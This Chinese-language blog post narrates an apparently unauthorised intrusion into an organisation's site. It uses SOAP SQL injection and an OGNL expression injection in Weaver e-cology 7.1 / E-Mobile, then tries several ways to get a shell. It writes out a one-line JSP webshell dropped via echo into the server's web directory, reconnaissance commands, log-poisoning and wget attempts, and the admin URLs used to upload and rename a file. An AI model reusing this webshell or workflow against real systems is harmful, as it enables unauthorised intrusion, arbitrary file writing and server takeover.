开篇
你迷信吗?我本不信,结果去年进去蹲了一段时间出来,各种霉,搞啥啥不顺,然后我妈居然非常神奇的去给我买了个红内裤....然后就有了今年的第一次成功渗透——泛微e-cology7.1 SOAP注入引发的血案.某站,160多个子站,先把和主站同服的子站全部简单看了一遍,没发现什么能利用的,讨厌阿里云,如今日站,各种WAF,工具都不敢用,不用工具手工真的成功率太低,心塞。 申明下,本文是一边搞一边写的,所以跑题了请勿见怪。。谁叫我运气不顺呢。。
发现SOAP注入
好吧,不扯了,进入正题吧,子站看了没找到什么突破口,不过发现一个泛微协同商务系统,感觉有戏,各种百度这套CMS的0day..


通过注入点拿shell
最快捷的方法有2种: 1.JSP通常都是以administrator权限运行的,所以可以直接通过系统命令获取权限。 2.获取后台密码,登陆OA系统GETSHELL。(我先选择这个,因为第一次遇到这个程序,还么有折腾过,先试试通过后台getshell.) 通过查看以前的漏洞记录得知后台表名:HrmResourceManager


柳暗花明
本是想着继续找找看看有没有泛微e-cology7.1 后台拿shell的文章,结果意外看到了这篇文章 泛微 E-Mobile Ognl 表达式注入
ls /
开始一个个的翻吧?容我百度百度看看有没有快捷的办法。。。。
1.失败命令:ps -ef | grep tomcat
find / -name tomcat
(后来发现根本不是tomcat...太年轻还有很长的路要走)
2. Linux 显示当前文件绝对路径命令:pwd && ls
成功得到路径:/usr/weaver/EMobile
Linux弱爆了,别笑,说的就是你..
echo 写shell:
echo -e "<% if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes()); %>" > /usr/weaver/EMobile/1.jsp


Linux可以GETSHELL的方法: echo 失败,没有报错,但是就是写入失败,并不是没有权限写入的问题,不知道是什么问题, wget 同样失败,wget -v 正常,测试发现无法连接外网。 history > /root/1.txt 失败,执行报错 将执行的命令和结果写入到文件的思路也不行 Linux 日志以及 网站日志 框架日志等各种日志和缓存写shell 均失败 其他的命令基本还算正常,但是也进入了一个苦恼期,不熟悉Linux,一时之间不知道该用什么方法写shell了,只有慢慢百度了。 利用e-cology上传任意格式文件的马儿,然后重命名,但是经过各种折腾发现,找不到上传后的路径,也是醉了。。
成功getshell
经过各种折腾研究,然后幸运的让我找到了泛微e-cology7.1 getshell的方法.... 第一步:访问https://www.mrwu.red/system/SystemSetEdit.jsp


https://www.mrwu.red/docs/DocBrowserMain.jsp?url=/page/maint/common/UserResourceBrowse.jsp?file=none



/page/resource/userfile/image/201804/I/1872262809
文件重命名


